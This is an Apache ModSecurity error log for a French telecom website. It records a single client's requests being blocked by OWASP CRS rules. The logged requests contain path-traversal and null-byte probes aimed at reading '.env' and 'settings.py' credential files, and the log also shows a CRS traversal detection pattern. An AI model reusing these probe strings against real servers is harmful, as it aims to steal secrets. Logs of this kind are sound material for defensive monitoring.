[Tue May 12 04:50:52.950562 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.950761 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.950806 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.950835 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.951242 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.967725 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjAgpmE1yW0glLdghnwAAAMg"]
[Tue May 12 04:50:52.990950 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:52.990995 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:52.991020 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:52.991220 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:52.991266 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:52.991301 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:52.991697 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:53.008360 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjAgpmE1yW0glLdghoAAAAMg"]
[Tue May 12 04:50:53.016485 2026] [security2:error] [pid 1820198:tid 1820216] [client 93.123.109.165:29936] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjM1tk6y7yBJLpJos7gAAAJA"]
[Tue May 12 04:50:53.032624 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.032672 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.032703 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.032928 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.032961 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.033354 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.050126 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjQgpmE1yW0glLdghoQAAAMg"]
[Tue May 12 04:50:53.278438 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghowAAAMg"]
[Tue May 12 04:50:53.278495 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghowAAAMg"]
[Tue May 12 04:50:53.278519 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghowAAAMg"]
[Tue May 12 04:50:53.279101 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/api/v1"] [unique_id "agKVjQgpmE1yW0glLdghowAAAMg"]
[Tue May 12 04:50:53.401301 2026] [security2:error] [pid 1808852:tid 1808859] [client 93.123.109.165:29956] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVjRfeipD4uoG21FolTgAAAAQ"]
[Tue May 12 04:50:53.401516 2026] [security2:error] [pid 1808852:tid 1808859] [client 93.123.109.165:29956] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVjRfeipD4uoG21FolTgAAAAQ"]
[Tue May 12 04:50:53.441037 2026] [security2:error] [pid 1730207:tid 1730224] [client 93.123.109.165:29972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjDue9Sp-pIv_Bb635gAAAU8"]
[Tue May 12 04:50:53.531852 2026] [security2:error] [pid 1730175:tid 1730192] [client 93.123.109.165:29990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agKVjXo6NvB9WXx5V-6huwAAAQ8"]
[Tue May 12 04:50:53.531986 2026] [security2:error] [pid 1730175:tid 1730192] [client 93.123.109.165:29990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agKVjXo6NvB9WXx5V-6huwAAAQ8"]
[Tue May 12 04:50:53.690834 2026] [security2:error] [pid 1825287:tid 1825313] [client 93.123.109.165:29886] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjQgpmE1yW0glLdghowAAAMg"]
[Tue May 12 04:50:53.709985 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:30032] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVjRfeipD4uoG21FolUAAAABE"], referer: https://tct-telecom.fr/api/v1?X-App-Env=%00
[Tue May 12 04:50:53.710035 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:30032] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVjRfeipD4uoG21FolUAAAABE"], referer: https://tct-telecom.fr/api/v1?X-App-Env=%00
[Tue May 12 04:50:53.710449 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:30032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 8)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKVjRfeipD4uoG21FolUAAAABE"], referer: https://tct-telecom.fr/api/v1?X-App-Env=%00
[Tue May 12 04:50:53.813581 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:30032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjRfeipD4uoG21FolUAAAABE"], referer: https://tct-telecom.fr/api/v1?X-App-Env=%00
[Tue May 12 04:50:53.831673 2026] [security2:error] [pid 1808852:tid 1808859] [client 93.123.109.165:29956] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVjRfeipD4uoG21FolTgAAAAQ"]
[Tue May 12 04:50:53.832647 2026] [core:error] [pid 1808852:tid 1808872] [client 93.123.109.165:30032] AH10244: invalid URI path (/../../.env)
